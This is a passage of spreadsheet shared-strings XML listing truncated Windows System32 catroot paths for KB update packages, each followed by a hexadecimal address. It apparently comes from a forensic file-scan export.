  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2968294_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f8470</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2966583~31bf385</t>
  </si>
  <si>
    <t>0xdf6f8788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2966583_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f88c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2968294~31bf385</t>
  </si>
  <si>
    <t>0xdf6f8aa0</t>
  </si>
  <si>
    <t>~~6.1.25.1.</t>
  </si>
  <si>
    <t>0xdf6f8dd8</t>
  </si>
  <si>
    <t>5.1.ca</t>
  </si>
  <si>
    <t>0xdf6f90f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2972211~31bf385</t>
  </si>
  <si>
    <t>0xdf6f9238</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2973201_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f9570</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2972211_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f9748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2972100_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f9a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2970228~31bf385</t>
  </si>
  <si>
    <t>0xdf6f9d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2970228_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6f9f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2972100~31bf385</t>
  </si>
  <si>
    <t>0xdf6fa3c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2973351_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fa6e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2973201~31bf385</t>
  </si>
  <si>
    <t>0xdf6fa8e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2977292_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6faac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2973112~31bf385</t>
  </si>
  <si>
    <t>0xdf6fadd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2973112_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fb028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2973351~31bf385</t>
  </si>
  <si>
    <t>0xdf6fb410</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2978742_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fb728</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2978120~31bf385</t>
  </si>
  <si>
    <t>0xdf6fb868</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2985461_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fba40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2978120_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fbb80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2978742~31bf385</t>
  </si>
  <si>
    <t>0xdf6fbeb8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2977292~31bf385</t>
  </si>
  <si>
    <t>0xdf6fc028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2984972_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fc300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2992611~31bf385</t>
  </si>
  <si>
    <t>0xdf6fc440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3003743~31bf385</t>
  </si>
  <si>
    <t>0xdf6fc6e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2984976~31bf385</t>
  </si>
  <si>
    <t>0xdf6fc9f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2984976_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fcd10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2984972~31bf385</t>
  </si>
  <si>
    <t>0xdf6fd320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2998812~31bf385</t>
  </si>
  <si>
    <t>0xdf6fd638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2998812_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6fd950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2991963~31bf385</t>
  </si>
  <si>
    <t>0xdf6fdc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2991963_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fdda8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2992611_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fdf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2985461~31bf385</t>
  </si>
  <si>
    <t>0xdf6fe148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3006137_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fe320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3004469_RTM~31b</t>
  </si>
  <si>
    <t>0xdf6fe638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3004375_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fe950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3004361~31bf385</t>
  </si>
  <si>
    <t>0xdf6fea90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3004375~31bf385</t>
  </si>
  <si>
    <t>0xdf6fec68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3004361_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fef80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3003743_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ff2c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3010788_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ff5d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3006137~31bf385</t>
  </si>
  <si>
    <t>0xdf6ff7e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3011780_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6ff9b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3006121~31bf385</t>
  </si>
  <si>
    <t>0xdf6ffcd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3006121_SP1~31b</t>
  </si>
  <si>
    <t>0xdf6fff80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3004469~31bf385</t>
  </si>
  <si>
    <t>0xdf700148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3020370~31bf385</t>
  </si>
  <si>
    <t>0xdf700320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3015428_RTM~31b</t>
  </si>
  <si>
    <t>0xdf700638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3013531~31bf385</t>
  </si>
  <si>
    <t>0xdf700950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3013531_SP1~31b</t>
  </si>
  <si>
    <t>0xdf700a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3015428~31bf385</t>
  </si>
  <si>
    <t>0xdf700c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3011780~31bf385</t>
  </si>
  <si>
    <t>0xdf700f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3010788~31bf385</t>
  </si>
  <si>
    <t>0xdf701300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3020388~31bf385</t>
  </si>
  <si>
    <t>0xdf701440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3021917_SP1~31b</t>
  </si>
  <si>
    <t>0xdf701778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3020388_SP1~31b</t>
  </si>
  <si>
    <t>0xdf701950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3020370_SP1~31b</t>
  </si>
  <si>
    <t>0xdf701c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3019978~31bf385</t>
  </si>
  <si>
    <t>0xdf701f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3019978_SP1~31b</t>
  </si>
  <si>
    <t>0xdf702278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3022777~31bf385</t>
  </si>
  <si>
    <t>0xdf7023b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3023215~31bf385</t>
  </si>
  <si>
    <t>0xdf702590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3022777_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7028a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3021917~31bf385</t>
  </si>
  <si>
    <t>0xdf702c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3021674~31bf385</t>
  </si>
  <si>
    <t>0xdf702f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3021674_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7032f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3035126_SP1~31b</t>
  </si>
  <si>
    <t>0xdf703608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3031432_SP1~31b</t>
  </si>
  <si>
    <t>0xdf703920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3030377~31bf385</t>
  </si>
  <si>
    <t>0xdf703a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3031432~31bf385</t>
  </si>
  <si>
    <t>0xdf703c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3030377_SP1~31b</t>
  </si>
  <si>
    <t>0xdf703ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3023215_SP1~31b</t>
  </si>
  <si>
    <t>0xdf704278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3042058_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7043b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3045685_SP1~31b</t>
  </si>
  <si>
    <t>0xdf704590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3037574~31bf385</t>
  </si>
  <si>
    <t>0xdf704950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3035132~31bf385</t>
  </si>
  <si>
    <t>0xdf704c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3035132_SP1~31b</t>
  </si>
  <si>
    <t>0xdf704da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3037574_SP1~31b</t>
  </si>
  <si>
    <t>0xdf704f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3035126~31bf385</t>
  </si>
  <si>
    <t>0xdf7052f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3046269_SP1~31b</t>
  </si>
  <si>
    <t>0xdf705430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3054476~31bf385</t>
  </si>
  <si>
    <t>0xdf705608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3046017~31bf385</t>
  </si>
  <si>
    <t>0xdf705920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3046017_SP1~31b</t>
  </si>
  <si>
    <t>0xdf705a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3046269~31bf385</t>
  </si>
  <si>
    <t>0xdf705c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3045685~31bf385</t>
  </si>
  <si>
    <t>0xdf705ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3042058~31bf385</t>
  </si>
  <si>
    <t>0xdf706288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3055642~31bf385</t>
  </si>
  <si>
    <t>0xdf7063c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3060716_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7065a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3055642_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7068b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3054476_SP1~31b</t>
  </si>
  <si>
    <t>0xdf706bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3046480~31bf385</t>
  </si>
  <si>
    <t>0xdf706ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3046480_RTM~31b</t>
  </si>
  <si>
    <t>0xdf707248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3061518~31bf385</t>
  </si>
  <si>
    <t>0xdf707388</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3067903~31bf385</t>
  </si>
  <si>
    <t>0xdf707560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3061518_SP1~31b</t>
  </si>
  <si>
    <t>0xdf707878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3060716~31bf385</t>
  </si>
  <si>
    <t>0xdf707c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3059317~31bf385</t>
  </si>
  <si>
    <t>0xdf707ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3059317_SP1~31b</t>
  </si>
  <si>
    <t>0xdf708288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3072305_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7085a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3071756_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7088b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3068708~31bf385</t>
  </si>
  <si>
    <t>0xdf7089f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3071756~31bf385</t>
  </si>
  <si>
    <t>0xdf708bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3068708_SP1~31b</t>
  </si>
  <si>
    <t>0xdf708ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3067903_SP1~31b</t>
  </si>
  <si>
    <t>0xdf709150</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3075220~31bf385</t>
  </si>
  <si>
    <t>0xdf709510</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3074543~31bf385</t>
  </si>
  <si>
    <t>0xdf709828</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3074543_SP1~31b</t>
  </si>
  <si>
    <t>0xdf709968</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3075220_SP1~31b</t>
  </si>
  <si>
    <t>0xdf709ad8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3072305~31bf385</t>
  </si>
  <si>
    <t>0xdf709c78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3075226_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70a1e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3078667_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70a4f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3078601~31bf385</t>
  </si>
  <si>
    <t>0xdf70a810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3078601_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70a950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3078667~31bf385</t>
  </si>
  <si>
    <t>0xdf70ab28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3076895~31bf385</t>
  </si>
  <si>
    <t>0xdf70ae40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3075226~31bf385</t>
  </si>
  <si>
    <t>0xdf70af80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3076895_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70b320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3084135~31bf385</t>
  </si>
  <si>
    <t>0xdf70b460</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3092601_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70b638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3084135_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70b950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3080149_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70bc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3080079~31bf385</t>
  </si>
  <si>
    <t>0xdf70bda8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3080149~31bf385</t>
  </si>
  <si>
    <t>0xdf70bf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3080079_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70c278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3092627~31bf385</t>
  </si>
  <si>
    <t>0xdf70c590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3092627_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70c6d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3093513_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70c8a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3092601~31bf385</t>
  </si>
  <si>
    <t>0xdf70cc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3086255~31bf385</t>
  </si>
  <si>
    <t>0xdf70cf80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3086255_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70d228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3102429_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70d430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3107998~31bf385</t>
  </si>
  <si>
    <t>0xdf70d608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3101722_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70d920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3097989~31bf385</t>
  </si>
  <si>
    <t>0xdf70dc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3097989_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70dd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3101722~31bf385</t>
  </si>
  <si>
    <t>0xdf70dee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3093513~31bf385</t>
  </si>
  <si>
    <t>0xdf70e288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3108381_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70e5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3108371~31bf385</t>
  </si>
  <si>
    <t>0xdf70e6e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3108664_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70e8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3108371_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70ebd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3107998_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70eee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3102429~31bf385</t>
  </si>
  <si>
    <t>0xdf70f248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3109560_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70f560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3109103~31bf385</t>
  </si>
  <si>
    <t>0xdf70f6a0</t>
  </si>
  <si>
